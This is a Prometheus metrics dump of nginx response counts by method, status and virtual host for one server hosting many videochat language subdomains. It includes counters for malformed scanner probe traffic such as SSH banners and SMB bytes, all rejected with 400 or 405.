nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ta.videochat.show"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ta.videochat.tv.br"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="te.videochat.world"} 28 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="tg.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="tg.videochat.show"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="tg.videochat.world"} 32 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="th.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="th.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="th.videochat.show"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="th.videochat.tv.br"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="th.videochat.world"} 29 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="tl.videochat.cafe"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="tl.videochat.show"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="tl.videochat.tv.br"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="tl.videochat.world"} 27 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="tr.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="tr.videochat.tv.br"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="tt.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="tt.videochat.show"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="tt.videochat.tv.br"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="udm.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="uk.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="uk.videochat.show"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ur.videochat.show"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ur.videochat.tv.br"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ur.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="uz.videochat.cafe"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="uz.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="uz.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="uz.videochat.tv.br"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="uz.videochat.world"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="vi.videochat.show"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="videochat.cafe"} 57 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="videochat.date"} 58 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="videochat.mx"} 47 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="videochat.show"} 88 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="videochat.tv.br"} 165 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="videochat.world"} 76 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="vmi460104.contaboserver.net"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="www.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="www.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="www.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="xh.videochat.show"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="xh.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="xh.videochat.world"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="yi.videochat.tv.br"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="zh.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="zh.videochat.show"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="zh.videochat.tv.br"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="504",vhost="pt.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="504",vhost="videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="504",vhost="videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PRI",status="400",vhost="-"} 377 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PROPFIND",status="405",vhost="161.97.120.25"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="302",vhost="161.97.120.25"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="302",vhost="af.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="302",vhost="ba.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="302",vhost="be.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="302",vhost="bn.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="302",vhost="ca.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="302",vhost="cs.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="302",vhost="da.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="302",vhost="fr.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="302",vhost="he.videochat.show"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="302",vhost="ko.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="302",vhost="mk.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="302",vhost="ms.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="302",vhost="mt.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="302",vhost="no.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="302",vhost="pl.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="302",vhost="sl.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="302",vhost="te.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="302",vhost="tg.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="302",vhost="videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="302",vhost="videochat.tv.br"} 44 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="161.97.120.25:80"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="af.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="al.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="am.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="ar.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="az.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="ba.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="be.videochat.cafe"} 32 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="be.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="bg.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="bn.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="bs.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="ca.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="ceb.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="chm.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="cs.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="cy.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="da.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="de.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="el.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="eo.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="es.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="eu.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="fa.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="fi.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="fr.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="ga.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="gl.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="gu.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="he.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="hi.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="hi.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="hr.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="hr.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="hu.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="hu.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="id.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="is.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="it.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="it.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="jp.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="kk.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="km.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="kn.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="ko.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="ky.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="lb.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="lo.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="lt.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="lv.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="lv.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="mg.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="mk.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="ml.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="mr.videochat.cafe"} 32 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="mr.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="ms.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="mt.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="my.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="ne.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="nl.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="no.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="pl.videochat.cafe"} 32 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="pl.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="pt.videochat.cafe"} 32 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="pt.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="sk.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="sk.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="sl.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="sl.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="te.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="tg.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="th.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="th.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="tl.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="uz.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="xh.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="405",vhost="he.videochat.show"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="499",vhost="161.97.120.25"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="503",vhost="161.97.120.25"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="503",vhost="bs.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="503",vhost="ceb.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="503",vhost="gl.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="503",vhost="gu.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="503",vhost="hr.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="503",vhost="jp.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="503",vhost="km.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="503",vhost="mr.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="503",vhost="tl.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="503",vhost="videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="SSH-2.0-Go",status="400",vhost="-"} 158 nginx_http_response_count_total{app="web",host="161.97.120.25",method="SSH-2.0-OpenSSH",status="400",vhost="-"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="SSH-2.0-OpenSSH_8.4p1",status="400",vhost="-"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="SSH-2.0-WanScannerBot",status="400",vhost="-"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="SSH-2.0-libssh_0.11.2",status="400",vhost="-"} 53 nginx_http_response_count_total{app="web",host="161.97.120.25",method="TDXP",status="405",vhost="161.97.120.25"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="TRACE",status="405",vhost="161.97.120.25:80"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="UNKNOWN",status="405",vhost="161.97.120.25"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="UNKNOWN",status="405",vhost="no.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="USER",status="400",vhost="-"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="ZZOD",status="405",vhost="161.97.120.25"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00#9b\\x01\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x00\\x00%\\xFFSMBr\\x00\\x00\\x00\\x00\\x18\\x01(\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x00\\x00>\\x00\\x03\\x00\\x00user\\x00postgres\\x00database\\x00postgres\\x00client_encoding\\x00UTF8\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 55 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x00\\x00\\x08\\x04\\xD2\\x16/",status="400",vhost="-"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x00\\x00f\\xFESMB@\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00$\\x00\\x01\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x10\\x02",status="400",vhost="-"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\x80Y\\xC3\\xB4\\x19\\x99iO\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\x81^N\\xC4\\x0B\\x0F\\xDA\\x89\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\x82",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\x82\\xBB\\x94\\xD2K\\xF6&N\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\x87`h\\xE0\\x9A\\xF1\\xA2|\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\x89\\xA6\\xA3\\xC8t\\x82\\xB1\\x86\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\x95\\xA1Nu;k\\x0C\\xD9\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\x97\\xA1\\x1CL",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\x98\\x95\\xF9T\\x08\\xAE\\xC1\\xBB\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\x99\\x15'\\xB3:\\x1BZo\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\x9As\\xA2g\\xB6\\x90\\x12\\xCA\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\x9D\\xB5\\xFC\\x91\\xB8\\xA0t\\x0F\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\x9D\\xEB\\x8F\\xF3\\xE0\\xE3+\\xBA\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\x9D\\xFDQ\\xC8h~eo\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\x9E\\x99\\x04\\x22XE\\x13\\x06\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\x9F^4_\\xAEX\\xB2g\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xA0)\\x83\\xCD,\\xF5\\xE2\\xA4\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xA0\\xD8\\xDA\\xDE\\x94\\x10\\xF8\\xAE\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xA1\\x1B\\x8A\\x98_\\xAC\\x13\\xB4\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xA4\\xB4\\x04\\xFB\\x92GL\\x8A\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xA5z\\xFB~\\xAE\\x17\\xBDE\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xAB\\xF1\\x03\\x98\\xED>\\xC7\\xE7\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xAC\\xB8%\\x08\\xB4\\x0Cp\\xDF\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xAD\\x1A\\xAC/}\\xD4\\xE9\\xA8\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xAD\\x8E\\xAD\\x99\\x90Duk\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xB1\\x17\\x95\\xC7K\\xE5!\\xE7\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xB3\\xE3T\\x83",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xB7\\xD2U\\xA6\\xB1*\\x83\\x8C\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xBA\\x0C4nXb'\\xB5\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xBBq\\xD8\\xC7M\\xDE\\x15\\xFF\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xBD!\\x1E\\x1BXJpk\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xC4\\xAB?3\\xA1\\xC3vs\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xC4\\xBD\\xC8\\xAD}m\\xC7V\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xC7=\\x1F\\xD3)\\xB6\\x14z\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xC8\\xBA\\xF0\\x00\\x97\\xD4S\\xDA\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xC9\\xFE\\xDB\\x16\\xFE\\xB8im\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xCD",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xD9\\x17\\xB9c\\x92\\x967\\xB0\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xDC~P\\xBF\\xBA{m\\x15\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xDE-\\x06\\x9B\\x13D\\xCC\\x87\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xE2\\xCD\\x07uA\\xDB\\x8Ec\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xE7*\\xAC\\x98\\x9E\\xEC\\x1C#\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xE8^\\x8A\\xCA}\\xBA\\x1DI\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xEB\\x93\\x06z\\x04\\xF9\\xE1\\xF5\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 